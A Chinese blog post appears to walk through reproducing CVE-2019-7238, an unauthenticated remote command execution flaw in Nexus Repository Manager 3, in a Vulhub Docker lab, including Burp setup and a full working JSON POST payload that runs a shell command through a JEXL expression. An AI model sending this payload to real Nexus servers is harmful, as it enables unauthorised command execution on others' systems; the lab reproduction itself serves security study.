利用Vulnhub复现漏洞 - Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)
2019-07-12 16:55
1881 查看
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)
Vulnhub官方复现教程
https://vulhub.org/#/environments/nexus/CVE-2019-7238/
漏洞原理
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。
参考链接:
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
- https://xz.aliyun.com/t/4136
- https://www.anquanke.com/post/id/171116
- http://commons.apache.org/proper/commons-jexl/
复现过程
启动环境
https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为
cd /root/vulhub/nexus/CVE-2019-7238
搭建及运行漏洞环境:
docker-compose build && docker-compose up -d
用时:3分钟
环境启动后,访问
http://your-ip:8081即可看到Web页面。
使用账号密码
admin:admin123登录后台,在
http://192.168.236.148:8081/#browse/upload选择
maven-releases,随便上传一个jar包:
显示
触发该漏洞,必须保证仓库里至少有一个包存在。
漏洞复现
接口没有校验权限,所以直接发送如下数据包,即可执行
touch /tmp/CVE-2019-7238_is_success命令:
端口设置
浏览器设置
以火狐浏览器FireFox为例,在
选项→
常规→
网络设置→
设置,将
连接中
手动代理配置的
HTTP代理,填写
127.0.0.1,端口为
8081
BurpSuit设置
在
Proxy下
Options的
Proxy Listeners编辑监听端口为
8081
并将
Proxy下
Intercept点击成
Intercept is on
发送请求
POST /service/extdirect HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 368 Connection: close {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter": [{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/CVE-2019-7238_is_success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
updatedb && locate CVE-2019-7238_is_success
可见,
/tmp/CVE-2019-7238_is_success已成功执行:
原理是expression位置的JEXL表达式被执行,详情可阅读参考文档。
利用classloader加载字节码即可获得回显:
相关文章推荐
- windows RDP远程代码执行_CVE-2019-0708漏洞复现
- Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
- CVE-2017-8464远程命令执行漏洞复现
- 利用Vulnhub复现漏洞 - Nginx 文件名逻辑漏洞(CVE-2013-4547)
- Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现
- Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现
- CVE-2017-8464 远程命令执行漏洞复现
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- 网站安全加固之apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
- 利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
- 利用Vulnhub复现漏洞 - Nginx越界读取缓存漏洞(CVE-2017-7529)
- iis6.0远程代码执行漏洞复现(CVE-2017-7269)
- DHCP命令执行CVE-2018-1111漏洞复现
- 【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
- 【漏洞公告】CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- IIS6.0远程命令执行漏洞(CVE-2017-7269)
- Supervisord远程命令执行漏洞分析(CVE-2017-11610)